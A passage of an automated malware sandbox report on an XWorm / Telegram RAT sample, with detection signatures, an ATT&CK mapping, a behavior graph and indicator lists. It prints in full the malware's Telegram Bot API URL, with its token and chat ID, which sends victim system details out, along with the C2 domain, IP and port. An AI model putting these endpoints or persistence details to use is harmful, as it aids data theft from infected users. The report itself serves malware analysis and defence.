                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3391026610.000000001B7B5000.00000004.00000020.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3396170228.000000001C2EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: Process Memory Space: VJV2AjJ7Na.exe PID: 6496, type: MEMORYSTR
                          Yara detected XWorm
                          Source: Yara matchFile source: VJV2AjJ7Na.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3360702564.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: VJV2AjJ7Na.exe PID: 6496, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: Process Memory Space: VJV2AjJ7Na.exe PID: 6496, type: MEMORYSTR
                          Yara detected XWorm
                          Source: Yara matchFile source: VJV2AjJ7Na.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3360702564.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: VJV2AjJ7Na.exe PID: 6496, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                          Windows Management Instrumentation                          		2
                          Registry Run Keys / Startup Folder                          		12
                          Process Injection                          		1
                          Masquerading                          		OS Credential Dumping541
                          Security Software Discovery                          		Remote Services11
                          Archive Collected Data                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          PowerShell                          		1
                          DLL Side-Loading                          		2
                          Registry Run Keys / Startup Folder                          		11
                          Disable or Modify Tools                          		LSASS Memory2
                          Process Discovery                          		Remote Desktop ProtocolData from Removable Media11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                          DLL Side-Loading                          		151
                          Virtualization/Sandbox Evasion                          		Security Account Manager151
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                          Process Injection                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput Capture1
                          Ingress Tool Transfer                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Deobfuscate/Decode Files or Information                          		LSA Secrets1
                          System Network Configuration Discovery                          		SSHKeylogging2
                          Non-Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                          Obfuscated Files or Information                          		Cached Domain Credentials1
                          File and Directory Discovery                          		VNCGUI Input Capture13
                          Application Layer Protocol                          		Data Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                          Software Packing                          		DCSync23
                          System Information Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483225 Sample: VJV2AjJ7Na.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 32 api.telegram.org 2->32 34 main-although.gl.at.ply.gg 2->34 36 ip-api.com 2->36 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for dropped file 2->48 52 17 other signatures 2->52 8 VJV2AjJ7Na.exe 14 5 2->8         started        signatures3 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 dnsIp5 38 ip-api.com 208.95.112.1, 49710, 80 TUT-ASUS United States 8->38 40 api.telegram.org 149.154.167.220, 443, 49719 TELEGRAMRU United Kingdom 8->40 42 main-although.gl.at.ply.gg 147.185.221.21, 30970, 49720 SALSGIVERUS United States 8->42 30 C:\Users\user\AppData\Roaming\XClient.exe, PE32 8->30 dropped 54 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->54 56 Protects its processes via BreakOnTermination flag 8->56 58 Bypasses PowerShell execution policy 8->58 60 3 other signatures 8->60 13 powershell.exe 23 8->13         started        16 powershell.exe 22 8->16         started        18 powershell.exe 23 8->18         started        20 powershell.exe 8->20         started        file6 signatures7 process8 signatures9 62 Loading BitLocker PowerShell Module 13->62 22 conhost.exe 13->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        process10

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          VJV2AjJ7Na.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                          VJV2AjJ7Na.exe100%AviraHEUR/AGEN.1305769
                          VJV2AjJ7Na.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Roaming\XClient.exe100%AviraHEUR/AGEN.1305769
                          C:\Users\user\AppData\Roaming\XClient.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\XClient.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWorm

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://nuget.org/NuGet.exe0%URL Reputationsafe
                          http://crl.m0%URL Reputationsafe
                          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                          https://contoso.com/0%URL Reputationsafe
                          https://nuget.org/nuget.exe0%URL Reputationsafe
                          https://contoso.com/License0%URL Reputationsafe
                          https://contoso.com/Icon0%URL Reputationsafe
                          https://aka.ms/pscore680%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                          https://ion=v4.5alC0%Avira URL Cloudsafe
                          https://api.telegram.org/bot0%Avira URL Cloudsafe
                          https://github.com/Pester/Pester0%Avira URL Cloudsafe
                          http://www.microsoft.co0%Avira URL Cloudsafe
                          http://crl.ml0%Avira URL Cloudsafe
                          http://crl.mic0%Avira URL Cloudsafe
                          http://go.microsoft.c0%Avira URL Cloudsafe
                          main-although.gl.at.ply.gg0%Avira URL Cloudsafe
                          https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.60%Avira URL Cloudsafe
                          http://go.microsoft.ctain0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          main-although.gl.at.ply.gg
                          		147.185.221.21
                          		truetrue
                            		unknown
                            ip-api.com
                            		208.95.112.1
                            		truetrue
                              		unknown
                              api.telegram.org
                              		149.154.167.220
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                main-although.gl.at.ply.ggtrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6false
                                • Avira URL Cloud: safe
                                		unknown
                                http://ip-api.com/line/?fields=hostingfalse
                                • URL Reputation: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2199242127.0000025C24A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2285409152.00000249247C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2412961852.000001DBDDE53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.mpowershell.exe, 00000005.00000002.2301226661.000002492CDBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.mlpowershell.exe, 00000002.00000002.2206032792.0000025C2D061000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ion=v4.5alCpowershell.exe, 0000000A.00000002.2645209881.0000025A60A70000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.telegram.org/botVJV2AjJ7Na.exe, XClient.exe.0.drtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2178194155.0000025C14C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.000002491497A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCE008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2178194155.0000025C14C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.000002491497A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCE008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2199242127.0000025C24A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2285409152.00000249247C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2412961852.000001DBDDE53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.microsoft.copowershell.exe, 00000005.00000002.2301226661.000002492CDDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.micpowershell.exe, 00000008.00000002.2435104153.000001DBE65E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://go.microsoft.cpowershell.exe, 00000002.00000002.2177459096.0000025C12DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://go.microsoft.ctainpowershell.exe, 00000002.00000002.2177459096.0000025C12DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2178194155.0000025C149E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.0000024914751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCDDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A48511000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVJV2AjJ7Na.exe, 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2178194155.0000025C149E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.0000024914751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCDDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A48511000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                208.95.112.1
                                		ip-api.comUnited States
                                		53334TUT-ASUStrue
                                149.154.167.220
                                		api.telegram.orgUnited Kingdom
                                		62041TELEGRAMRUtrue
                                147.185.221.21
                                		main-although.gl.at.ply.ggUnited States
                                		12087SALSGIVERUStrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1483225
                                Start date and time:2024-07-26 21:21:06 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 13s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:14
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:VJV2AjJ7Na.exe
                                renamed because original name is a hash value
                                Original Sample Name:a9f1d82a7954d86d746086969c0d7b7b5ca65ccfd0d6a375931a6826eca1a8c7.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@13/19@3/3
                                EGA Information:
                                • Successful, ratio: 20%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 46
                                • Number of non-executed functions: 7
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 1208 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 1216 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 3300 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 736 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • VT rate limit hit for: VJV2AjJ7Na.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:22:00API Interceptor55x Sleep call for process: powershell.exe modified
                                15:22:53API Interceptor332905x Sleep call for process: VJV2AjJ7Na.exe modified
                                21:22:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                208.95.112.1CTIPUPiILj.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                • ip-api.com/line/?fields=hosting
                                Built.exeGet hashmaliciousBlank GrabberBrowse
                                • ip-api.com/json/?fields=225545
                                JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                • ip-api.com/json
                                LisectAVT_2403002A_1.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                LisectAVT_2403002A_147.exeGet hashmaliciousBlank GrabberBrowse
                                • ip-api.com/json/?fields=225545
                                LisectAVT_2403002A_368.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                • ip-api.com/json/?fields=225545
                                LisectAVT_2403002A_473.exeGet hashmaliciousNjrat, XWormBrowse
                                • ip-api.com/line/?fields=hosting
                                LisectAVT_2403002A_473.exeGet hashmaliciousNjrat, XWormBrowse
                                • ip-api.com/line/?fields=hosting
                                LisectAVT_2403002A_52.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                LisectAVT_2403002B_109.exeGet hashmaliciousBlackshadesBrowse
                                • ip-api.com/json/
                                149.154.167.220zx.ps1Get hashmaliciousUnknownBrowse
                                  new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                      7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
